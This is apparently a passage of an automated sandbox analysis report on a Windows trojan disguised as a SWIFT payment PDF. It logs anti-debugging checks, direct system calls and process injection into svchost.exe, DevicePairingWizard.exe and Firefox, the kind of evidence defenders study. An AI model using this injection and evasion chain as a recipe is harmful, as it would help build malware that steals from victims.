Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032337E4 mov eax, dword ptr fs:[00000030h]	2_2_032337E4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032337E4 mov eax, dword ptr fs:[00000030h]	2_2_032337E4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032337E4 mov eax, dword ptr fs:[00000030h]	2_2_032337E4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032337E4 mov eax, dword ptr fs:[00000030h]	2_2_032337E4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032337E4 mov eax, dword ptr fs:[00000030h]	2_2_032337E4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032337E4 mov eax, dword ptr fs:[00000030h]	2_2_032337E4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032377F9 mov eax, dword ptr fs:[00000030h]	2_2_032377F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032377F9 mov eax, dword ptr fs:[00000030h]	2_2_032377F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032EF7CF mov eax, dword ptr fs:[00000030h]	2_2_032EF7CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03237623 mov eax, dword ptr fs:[00000030h]	2_2_03237623
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DD62C mov ecx, dword ptr fs:[00000030h]	2_2_032DD62C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DD62C mov ecx, dword ptr fs:[00000030h]	2_2_032DD62C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DD62C mov eax, dword ptr fs:[00000030h]	2_2_032DD62C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03235622 mov eax, dword ptr fs:[00000030h]	2_2_03235622
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03235622 mov eax, dword ptr fs:[00000030h]	2_2_03235622
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326C620 mov eax, dword ptr fs:[00000030h]	2_2_0326C620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03230630 mov eax, dword ptr fs:[00000030h]	2_2_03230630
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03260630 mov eax, dword ptr fs:[00000030h]	2_2_03260630
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B8633 mov esi, dword ptr fs:[00000030h]	2_2_032B8633
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B8633 mov eax, dword ptr fs:[00000030h]	2_2_032B8633
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B8633 mov eax, dword ptr fs:[00000030h]	2_2_032B8633
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326F63F mov eax, dword ptr fs:[00000030h]	2_2_0326F63F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326F63F mov eax, dword ptr fs:[00000030h]	2_2_0326F63F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C3608 mov eax, dword ptr fs:[00000030h]	2_2_032C3608
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C3608 mov eax, dword ptr fs:[00000030h]	2_2_032C3608
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C3608 mov eax, dword ptr fs:[00000030h]	2_2_032C3608
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C3608 mov eax, dword ptr fs:[00000030h]	2_2_032C3608
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C3608 mov eax, dword ptr fs:[00000030h]	2_2_032C3608
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C3608 mov eax, dword ptr fs:[00000030h]	2_2_032C3608
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325D600 mov eax, dword ptr fs:[00000030h]	2_2_0325D600
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325D600 mov eax, dword ptr fs:[00000030h]	2_2_0325D600
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B9603 mov eax, dword ptr fs:[00000030h]	2_2_032B9603
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032EF607 mov eax, dword ptr fs:[00000030h]	2_2_032EF607
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326360F mov eax, dword ptr fs:[00000030h]	2_2_0326360F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03304600 mov eax, dword ptr fs:[00000030h]	2_2_03304600
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03227662 mov eax, dword ptr fs:[00000030h]	2_2_03227662
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03227662 mov eax, dword ptr fs:[00000030h]	2_2_03227662
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03227662 mov eax, dword ptr fs:[00000030h]	2_2_03227662
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03243660 mov eax, dword ptr fs:[00000030h]	2_2_03243660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03243660 mov eax, dword ptr fs:[00000030h]	2_2_03243660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03243660 mov eax, dword ptr fs:[00000030h]	2_2_03243660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B166E mov eax, dword ptr fs:[00000030h]	2_2_032B166E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B166E mov eax, dword ptr fs:[00000030h]	2_2_032B166E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B166E mov eax, dword ptr fs:[00000030h]	2_2_032B166E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326666D mov esi, dword ptr fs:[00000030h]	2_2_0326666D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326666D mov eax, dword ptr fs:[00000030h]	2_2_0326666D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326666D mov eax, dword ptr fs:[00000030h]	2_2_0326666D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032BE660 mov eax, dword ptr fs:[00000030h]	2_2_032BE660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C5660 mov eax, dword ptr fs:[00000030h]	2_2_032C5660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03230670 mov eax, dword ptr fs:[00000030h]	2_2_03230670
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272670 mov eax, dword ptr fs:[00000030h]	2_2_03272670
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272670 mov eax, dword ptr fs:[00000030h]	2_2_03272670
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03233640 mov eax, dword ptr fs:[00000030h]	2_2_03233640
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324F640 mov eax, dword ptr fs:[00000030h]	2_2_0324F640
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324F640 mov eax, dword ptr fs:[00000030h]	2_2_0324F640
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324F640 mov eax, dword ptr fs:[00000030h]	2_2_0324F640
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326C640 mov eax, dword ptr fs:[00000030h]	2_2_0326C640
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326C640 mov eax, dword ptr fs:[00000030h]	2_2_0326C640
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322D64A mov eax, dword ptr fs:[00000030h]	2_2_0322D64A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322D64A mov eax, dword ptr fs:[00000030h]	2_2_0322D64A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03265654 mov eax, dword ptr fs:[00000030h]	2_2_03265654
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323965A mov eax, dword ptr fs:[00000030h]	2_2_0323965A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323965A mov eax, dword ptr fs:[00000030h]	2_2_0323965A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326265C mov eax, dword ptr fs:[00000030h]	2_2_0326265C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326265C mov ecx, dword ptr fs:[00000030h]	2_2_0326265C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326265C mov eax, dword ptr fs:[00000030h]	2_2_0326265C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F86A8 mov eax, dword ptr fs:[00000030h]	2_2_032F86A8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F86A8 mov eax, dword ptr fs:[00000030h]	2_2_032F86A8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032EF68C mov eax, dword ptr fs:[00000030h]	2_2_032EF68C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240680 mov eax, dword ptr fs:[00000030h]	2_2_03240680
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240680 mov eax, dword ptr fs:[00000030h]	2_2_03240680
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240680 mov eax, dword ptr fs:[00000030h]	2_2_03240680
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240680 mov eax, dword ptr fs:[00000030h]	2_2_03240680
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240680 mov eax, dword ptr fs:[00000030h]	2_2_03240680
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240680 mov eax, dword ptr fs:[00000030h]	2_2_03240680
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240680 mov eax, dword ptr fs:[00000030h]	2_2_03240680
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240680 mov eax, dword ptr fs:[00000030h]	2_2_03240680
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240680 mov eax, dword ptr fs:[00000030h]	2_2_03240680
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240680 mov eax, dword ptr fs:[00000030h]	2_2_03240680
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240680 mov eax, dword ptr fs:[00000030h]	2_2_03240680
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240680 mov eax, dword ptr fs:[00000030h]	2_2_03240680
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03238690 mov eax, dword ptr fs:[00000030h]	2_2_03238690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AD69D mov eax, dword ptr fs:[00000030h]	2_2_032AD69D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032BC691 mov eax, dword ptr fs:[00000030h]	2_2_032BC691
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032296E0 mov eax, dword ptr fs:[00000030h]	2_2_032296E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032296E0 mov eax, dword ptr fs:[00000030h]	2_2_032296E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323C6E0 mov eax, dword ptr fs:[00000030h]	2_2_0323C6E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032356E0 mov eax, dword ptr fs:[00000030h]	2_2_032356E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032356E0 mov eax, dword ptr fs:[00000030h]	2_2_032356E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032356E0 mov eax, dword ptr fs:[00000030h]	2_2_032356E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032566E0 mov eax, dword ptr fs:[00000030h]	2_2_032566E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032566E0 mov eax, dword ptr fs:[00000030h]	2_2_032566E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C56E0 mov eax, dword ptr fs:[00000030h]	2_2_032C56E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C56E0 mov eax, dword ptr fs:[00000030h]	2_2_032C56E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AC6F2 mov eax, dword ptr fs:[00000030h]	2_2_032AC6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AC6F2 mov eax, dword ptr fs:[00000030h]	2_2_032AC6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032306CF mov eax, dword ptr fs:[00000030h]	2_2_032306CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032FA6C0 mov eax, dword ptr fs:[00000030h]	2_2_032FA6C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D86C2 mov eax, dword ptr fs:[00000030h]	2_2_032D86C2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325D6D0 mov eax, dword ptr fs:[00000030h]	2_2_0325D6D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C66D0 mov eax, dword ptr fs:[00000030h]	2_2_032C66D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C66D0 mov eax, dword ptr fs:[00000030h]	2_2_032C66D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03261527 mov eax, dword ptr fs:[00000030h]	2_2_03261527
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326F523 mov eax, dword ptr fs:[00000030h]	2_2_0326F523
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324252B mov eax, dword ptr fs:[00000030h]	2_2_0324252B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324252B mov eax, dword ptr fs:[00000030h]	2_2_0324252B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324252B mov eax, dword ptr fs:[00000030h]	2_2_0324252B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324252B mov eax, dword ptr fs:[00000030h]	2_2_0324252B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324252B mov eax, dword ptr fs:[00000030h]	2_2_0324252B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324252B mov eax, dword ptr fs:[00000030h]	2_2_0324252B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324252B mov eax, dword ptr fs:[00000030h]	2_2_0324252B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03233536 mov eax, dword ptr fs:[00000030h]	2_2_03233536
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03233536 mov eax, dword ptr fs:[00000030h]	2_2_03233536
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322753F mov eax, dword ptr fs:[00000030h]	2_2_0322753F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322753F mov eax, dword ptr fs:[00000030h]	2_2_0322753F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322753F mov eax, dword ptr fs:[00000030h]	2_2_0322753F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272539 mov eax, dword ptr fs:[00000030h]	2_2_03272539
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322B502 mov eax, dword ptr fs:[00000030h]	2_2_0322B502
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325E507 mov eax, dword ptr fs:[00000030h]	2_2_0325E507
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325E507 mov eax, dword ptr fs:[00000030h]	2_2_0325E507
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325E507 mov eax, dword ptr fs:[00000030h]	2_2_0325E507
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325E507 mov eax, dword ptr fs:[00000030h]	2_2_0325E507
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325E507 mov eax, dword ptr fs:[00000030h]	2_2_0325E507
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325E507 mov eax, dword ptr fs:[00000030h]	2_2_0325E507
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325E507 mov eax, dword ptr fs:[00000030h]	2_2_0325E507
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325E507 mov eax, dword ptr fs:[00000030h]	2_2_0325E507
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03232500 mov eax, dword ptr fs:[00000030h]	2_2_03232500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326C50D mov eax, dword ptr fs:[00000030h]	2_2_0326C50D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326C50D mov eax, dword ptr fs:[00000030h]	2_2_0326C50D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03251514 mov eax, dword ptr fs:[00000030h]	2_2_03251514
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03251514 mov eax, dword ptr fs:[00000030h]	2_2_03251514
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03251514 mov eax, dword ptr fs:[00000030h]	2_2_03251514
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03251514 mov eax, dword ptr fs:[00000030h]	2_2_03251514
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03251514 mov eax, dword ptr fs:[00000030h]	2_2_03251514
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03251514 mov eax, dword ptr fs:[00000030h]	2_2_03251514
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032BC51D mov eax, dword ptr fs:[00000030h]	2_2_032BC51D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DF51B mov eax, dword ptr fs:[00000030h]	2_2_032DF51B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DF51B mov eax, dword ptr fs:[00000030h]	2_2_032DF51B

Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe

Code function: 0_2_004238DA GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,SetEndOfFile,GetLastError,

0_2_004238DA

Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 0_2_0041F250 SetUnhandledExceptionFilter,	0_2_0041F250
Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 0_2_0041A208 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0041A208
Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 0_2_00417DAA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00417DAA

HIPS / PFW / Operating System Protection Evasion

Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe	NtCreateFile: Direct from: 0x77792F0C	Jump to behavior
Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe	NtSetInformationThread: Direct from: 0x77786319	Jump to behavior
Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe	NtQueryVolumeInformationFile: Direct from: 0x77792E4C	Jump to behavior
Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe	NtDeviceIoControlFile: Direct from: 0x77792A0C	Jump to behavior
Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe	NtAllocateVirtualMemory: Direct from: 0x77792B0C	Jump to behavior
Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe	NtOpenSection: Direct from: 0x77792D2C	Jump to behavior
Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe	NtQuerySystemInformation: Direct from: 0x777947EC	Jump to behavior
Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe	NtSetInformationProcess: Direct from: 0x77792B7C	Jump to behavior
Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe	NtReadVirtualMemory: Direct from: 0x77792DAC	Jump to behavior
Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe	NtOpenFile: Direct from: 0x77792CEC	Jump to behavior
Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe	NtProtectVirtualMemory: Direct from: 0x77787A4E	Jump to behavior
Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe	NtQueryInformationToken: Direct from: 0x77792BCC	Jump to behavior
Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe	NtAllocateVirtualMemory: Direct from: 0x77793BBC	Jump to behavior
Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe	NtAllocateVirtualMemory: Direct from: 0x77792B1C	Jump to behavior
Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe	NtResumeThread: Direct from: 0x777935CC	Jump to behavior
Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe	NtReadFile: Direct from: 0x777929FC	Jump to behavior
Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe	NtQuerySystemInformation: Direct from: 0x77792D1C	Jump to behavior
Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe	NtNotifyChangeKey: Direct from: 0x77793B4C	Jump to behavior
Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe	NtWriteVirtualMemory: Direct from: 0x77792D5C	Jump to behavior
Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe	NtMapViewOfSection: Direct from: 0x77792C3C	Jump to behavior
Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe	NtClose: Direct from: 0x77792A8C
Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe	NtCreateKey: Direct from: 0x77792B8C	Jump to behavior
Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe	NtSetInformationThread: Direct from: 0x77792A6C	Jump to behavior
Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe	NtQueryAttributesFile: Direct from: 0x77792D8C	Jump to behavior
Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe	NtAllocateVirtualMemory: Direct from: 0x7779480C	Jump to behavior
Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe	NtCreateUserProcess: Direct from: 0x7779363C	Jump to behavior
Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe	NtQueryInformationProcess: Direct from: 0x77792B46	Jump to behavior
Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe	NtResumeThread: Direct from: 0x77792EDC	Jump to behavior
Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe	NtWriteVirtualMemory: Direct from: 0x7779482C	Jump to behavior
Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe	NtProtectVirtualMemory: Direct from: 0x77792EBC	Jump to behavior
Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe	NtDelayExecution: Direct from: 0x77792CFC	Jump to behavior
Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe	NtOpenKeyEx: Direct from: 0x77792ABC	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\DevicePairingWizard.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Section loaded: NULL target: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Section loaded: NULL target: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\DevicePairingWizard.exe

Thread register set: target process: 1752

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\DevicePairingWizard.exe

Thread APC queued: target process: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe

Writes to foreign memory regions

Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe

Memory written: C:\Windows\SysWOW64\svchost.exe base: 71B008

Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe

Code function: 0_2_00436CD7 LogonUserW,

0_2_00436CD7

Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe

0_2_0040D590

Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe

